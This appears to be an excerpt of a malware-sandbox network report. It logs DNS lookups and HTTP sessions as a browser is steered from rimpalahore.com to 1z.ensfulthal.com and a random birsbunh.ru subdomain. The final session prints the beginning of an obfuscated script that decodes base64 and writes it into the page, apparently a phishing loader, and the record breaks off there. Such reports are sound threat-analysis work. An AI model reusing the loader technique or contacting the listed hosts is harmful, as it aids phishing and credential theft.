                                                                                          Nov 27, 2024 15:15:09.241137028 CET1.1.1.1192.168.2.160x13dNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:09.255955935 CET1.1.1.1192.168.2.160xe17cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:09.255955935 CET1.1.1.1192.168.2.160xe17cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:09.262090921 CET1.1.1.1192.168.2.160x6408No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:14.420655012 CET1.1.1.1192.168.2.160x5d8cNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:34.231898069 CET1.1.1.1192.168.2.160xe352No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:34.231898069 CET1.1.1.1192.168.2.160xe352No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:50.764374971 CET1.1.1.1192.168.2.160xa198No error (0)u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:50.766809940 CET1.1.1.1192.168.2.160xe83dNo error (0)u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru172.67.191.200A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:50.766809940 CET1.1.1.1192.168.2.160xe83dNo error (0)u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru104.21.11.98A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:54.714481115 CET1.1.1.1192.168.2.160xaa6dNo error (0)u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:54.715167999 CET1.1.1.1192.168.2.160xf89dNo error (0)u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru104.21.11.98A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:54.715167999 CET1.1.1.1192.168.2.160xf89dNo error (0)u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru172.67.191.200A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:55.034352064 CET1.1.1.1192.168.2.160x85e6No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:55.034352064 CET1.1.1.1192.168.2.160x85e6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.211.18A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:55.034352064 CET1.1.1.1192.168.2.160x85e6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.59.37A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:55.034352064 CET1.1.1.1192.168.2.160x85e6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.208.106A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:55.034352064 CET1.1.1.1192.168.2.160x85e6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.208.103A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:55.034352064 CET1.1.1.1192.168.2.160x85e6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.211.19A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:55.034352064 CET1.1.1.1192.168.2.160x85e6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.56.99A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:55.034352064 CET1.1.1.1192.168.2.160x85e6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.211.37A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:55.034352064 CET1.1.1.1192.168.2.160x85e6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.208.102A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:55.118859053 CET8.8.8.8192.168.2.160x3014No error (0)google.com142.250.181.142A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:55.122531891 CET1.1.1.1192.168.2.160xacf5No error (0)google.com172.217.17.78A (IP address)IN (0x0001)false
                                                                                          • rimpalahore.com
                                                                                          • https:
                                                                                            • p13n.adobe.io
                                                                                            • 1z.ensfulthal.com
                                                                                            • challenges.cloudflare.com
                                                                                            • code.jquery.com
                                                                                            • cdnjs.cloudflare.com
                                                                                            • u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru
                                                                                          • fs.microsoft.com
                                                                                          • slscr.update.microsoft.com
                                                                                          • a.nel.cloudflare.com
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.164970323.218.208.109443
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:14:41 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          Accept-Encoding: identity
                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                          Host: fs.microsoft.com
                                                                                          2024-11-27 14:14:42 UTC479INHTTP/1.1 200 OK
                                                                                          Content-Type: application/octet-stream
                                                                                          Server: Kestrel
                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                          X-Ms-Region: prod-neu-z1
                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                          X-OSID: 2
                                                                                          X-CID: 2
                                                                                          X-CCC: GB
                                                                                          Cache-Control: public, max-age=129964
                                                                                          Date: Wed, 27 Nov 2024 14:14:42 GMT
                                                                                          Connection: close
                                                                                          X-CID: 2


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.1649707135.181.212.2064435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:14:41 UTC663OUTGET /odin/ HTTP/1.1
                                                                                          Host: rimpalahore.com
                                                                                          Connection: keep-alive
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Upgrade-Insecure-Requests: 1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-Mode: navigate
                                                                                          Sec-Fetch-User: ?1
                                                                                          Sec-Fetch-Dest: document
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:14:42 UTC159INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:14:42 GMT
                                                                                          Server: Apache
                                                                                          Connection: close
                                                                                          Transfer-Encoding: chunked
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          2024-11-27 14:14:42 UTC4421INData Raw: 31 31 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 66 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 22 20 63 6f 6e 74 65 6e 74 3d 22 44 45 4e 59 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 78 2d
                                                                                          Data Ascii: 1138<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-Content-Type-Options" content="nosniff"> <meta http-equiv="X-Frame-Options" content="DENY"> <meta http-equiv="Strict-Transport-Security" content="max-


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.1649706135.181.212.2064435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:14:42 UTC591OUTGET /favicon.ico HTTP/1.1
                                                                                          Host: rimpalahore.com
                                                                                          Connection: keep-alive
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                          Sec-Fetch-Site: same-origin
                                                                                          Sec-Fetch-Mode: no-cors
                                                                                          Sec-Fetch-Dest: image
                                                                                          Referer: https://rimpalahore.com/odin/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:14:43 UTC353INHTTP/1.1 302 Found
                                                                                          Date: Wed, 27 Nov 2024 14:14:42 GMT
                                                                                          Server: Apache
                                                                                          Link: <https://www.rimpalahore.com/wp-json/>; rel="https://api.w.org/"
                                                                                          X-Redirect-By: WordPress
                                                                                          Location: https://www.rimpalahore.com/wp-content/uploads/2023/08/cropped-rimpa_slider_logo-32x32.png
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.164971123.218.208.109443
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:14:43 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          Accept-Encoding: identity
                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                          Range: bytes=0-2147483646
                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                          Host: fs.microsoft.com
                                                                                          2024-11-27 14:14:44 UTC535INHTTP/1.1 200 OK
                                                                                          Content-Type: application/octet-stream
                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                          ApiVersion: Distribute 1.1
                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                          X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                          Cache-Control: public, max-age=131040
                                                                                          Date: Wed, 27 Nov 2024 14:14:44 GMT
                                                                                          Content-Length: 55
                                                                                          Connection: close
                                                                                          X-CID: 2
                                                                                          2024-11-27 14:14:44 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.164971652.6.155.204436540C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:14:46 UTC1473OUTGET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                                                          Host: p13n.adobe.io
                                                                                          Connection: keep-alive
                                                                                          sec-ch-ua: "Chromium";v="105"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                                                          x-adobe-uuid: fe97c538-da5e-4108-829d-bf7bd7076578
                                                                                          x-adobe-uuid-type: visitorId
                                                                                          x-api-key: AdobeReader9
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Origin: https://rna-resource.acrobat.com
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Sec-Fetch-Site: cross-site
                                                                                          Sec-Fetch-Mode: cors
                                                                                          Sec-Fetch-Dest: empty
                                                                                          Referer: https://rna-resource.acrobat.com/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          2024-11-27 14:14:47 UTC608INHTTP/1.1 200
                                                                                          Server: openresty
                                                                                          Date: Wed, 27 Nov 2024 14:14:47 GMT
                                                                                          Content-Type: application/json;charset=UTF-8
                                                                                          Content-Length: 4762
                                                                                          Connection: close
                                                                                          x-request-id: OqDaGOgChDN9lD5JS3iHw6CNXuu2SJ5j
                                                                                          vary: accept-encoding
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, OPTIONS
                                                                                          Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Expose-Headers: x-request-id
                                                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                          2024-11-27 14:14:47 UTC4762INData Raw: 7b 22 73 75 72 66 61 63 65 73 22 3a 7b 22 44 43 5f 52 65 61 64 65 72 5f 48 6f 6d 65 5f 4c 48 50 5f 54 72 69 61 6c 5f 42 61 6e 6e 65 72 22 3a 7b 22 63 6f 6e 74 61 69 6e 65 72 73 22 3a 5b 7b 22 63 6f 6e 74 61 69 6e 65 72 49 64 22 3a 31 2c 22 63 6f 6e 74 61 69 6e 65 72 4c 61 62 65 6c 22 3a 22 4a 53 4f 4e 20 66 6f 72 20 44 43 5f 52 65 61 64 65 72 5f 48 6f 6d 65 5f 4c 48 50 5f 54 72 69 61 6c 5f 42 61 6e 6e 65 72 22 2c 22 64 61 74 61 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 2c 22 64 61 74 61 22 3a 22 65 79 4a 6a 64 47 45 69 4f 6e 73 69 64 47 56 34 64 43 49 36 49 6c 52 79 65 53 42 42 59 33 4a 76 59 6d 46 30 49 46 42 79 62 79 4a 39 4c 43 4a 31 61 53 49 36 65 79 4a 30 61 58 52 73 5a 56 39 7a 64 48 6c 73 61 57 35 6e 49 6a 70 37 49 6d
                                                                                          Data Ascii: {"surfaces":{"DC_Reader_Home_LHP_Trial_Banner":{"containers":[{"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","dataType":"application/json","data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7Im


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.164971552.149.20.212443
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:14:47 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VOvE8RzO5wNHmSm&MD=BhyuRolF HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                          Host: slscr.update.microsoft.com
                                                                                          2024-11-27 14:14:47 UTC560INHTTP/1.1 200 OK
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Content-Type: application/octet-stream
                                                                                          Expires: -1
                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                          MS-CorrelationId: 97629d24-7526-40fc-8076-3e3c9c59f42f
                                                                                          MS-RequestId: 309ac239-e87b-4efa-860b-86ba03c69bbd
                                                                                          MS-CV: kr9QqTQnUEmagnSZ.0
                                                                                          X-Microsoft-SLSClientCache: 2880
                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Date: Wed, 27 Nov 2024 14:14:46 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 24490
                                                                                          2024-11-27 14:14:47 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                          2024-11-27 14:14:47 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.1649723104.21.52.1304435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:03 UTC709OUTGET /mw2hN4k/ HTTP/1.1
                                                                                          Host: 1z.ensfulthal.com
                                                                                          Connection: keep-alive
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Upgrade-Insecure-Requests: 1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                          Sec-Fetch-Site: cross-site
                                                                                          Sec-Fetch-Mode: navigate
                                                                                          Sec-Fetch-User: ?1
                                                                                          Sec-Fetch-Dest: document
                                                                                          Referer: https://rimpalahore.com/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:04 UTC1250INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:15:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache, private
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2ForYiYJtyobdGHNkwrkTd79tvIDGFTAWgIrEDuf59EF2elvbViK1xpRaOvmbAjY%2FtrzW1%2Fnf9z63UWspsmhuc1egf2jUc6oc%2BbGoO24wTzvtGfJfDs8%2BHoBN7%2Fvag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=35771&min_rtt=35691&rtt_var=13441&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1612&delivery_rate=79796&cwnd=235&unsent_bytes=0&cid=add38ea1e2d60060&ts=223&x=0"
                                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6Inp2RFFzRnR2dTgrazVyTzRtTmNzWEE9PSIsInZhbHVlIjoiRDdNNy9QRUVvWXR1MmJibVhMc1d1cEdxYUtOdDFSUCtXQ1JWNFBDV3RKZjdrMlZlcGVGaUU3QTRGYkNwVjgzbk80V014UHdzdzhBRkloVGtaaE1LVnpqYUU5eFR2WS9zYnN6VURlK3hsa0ZIenkzbFNMNmdIVzVDS3lRbHROKzYiLCJtYWMiOiI0NjJjODE2NTNiNzExOWI2MGQ1ZDMxNmQ0YzIwM2FjYmFlNzlmZWFhNGY0MDYxMDdlMGZmNTYxMWJlOThlZWM5IiwidGFnIjoiIn0%3D; expires=Wed, 27-Nov-2024 16:15:04 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                          2024-11-27 14:15:04 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 69 73 35 4f 55 6c 55 4b 33 64 47 59 32 74 59 62 6b 68 59 63 6d 45 32 4d 44 4a 52 4f 47 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 57 5a 46 5a 31 68 58 61 31 5a 51 52 30 35 75 5a 54 4e 6d 63 6a 56 53 63 56 46 56 53 6d 4a 45 61 56 46 5a 65 58 5a 47 51 6e 5a 73 63 48 56 46 65 48 67 72 54 6c 42 6e 5a 47 46 4c 4b 33 5a 55 52 30 68 4d 55 46 46 46 52 6b 46 50 65 6c 46 44 51 31 64 4a 61 55 5a 6d 65 57 34 76 4e 48 5a 58 54 31 64 36 63 6d 39 57 4e 31 6c 45 63 6c 70 36 4f 45 46 43 63 32 56 74 61 32 59 78 53 30 68 31 53 69 74 6d 4d 6b 70 69 64 44 4e 49 59 32 78 70 63 6d 68 35 4e 6c 42 76 4e 6e 51 72 4f 55 52 6f 4d 32 68 79 4e 31 64 52 5a 56 49
                                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Iis5OUlUK3dGY2tYbkhYcmE2MDJROGc9PSIsInZhbHVlIjoicWZFZ1hXa1ZQR05uZTNmcjVScVFVSmJEaVFZeXZGQnZscHVFeHgrTlBnZGFLK3ZUR0hMUFFFRkFPelFDQ1dJaUZmeW4vNHZXT1d6cm9WN1lEclp6OEFCc2Vta2YxS0h1SitmMkpidDNIY2xpcmh5NlBvNnQrOURoM2hyN1dRZVI
                                                                                          2024-11-27 14:15:04 UTC256INData Raw: 66 61 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 49 20 66 69 6e 64 20 74 68 61 74 20 74 68 65 20 68 61 72 64 65 72 20 49 20 77 6f 72 6b 2c 20 74 68 65 20 6d 6f 72 65 20 6c 75 63 6b 20 49 20 73 65 65 6d 20 74 6f 20 68 61 76 65 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 77 55 79 35 6c 62 6e 4e 6d 64 57 78 30 61 47 46 73 4c 6d 4e 76 62 53 39 74 64 7a 4a 6f 54 6a 52 72 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 0d
                                                                                          Data Ascii: fa<script>/* I find that the harder I work, the more luck I seem to have. */if(atob("aHR0cHM6Ly8wUy5lbnNmdWx0aGFsLmNvbS9tdzJoTjRrLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8a
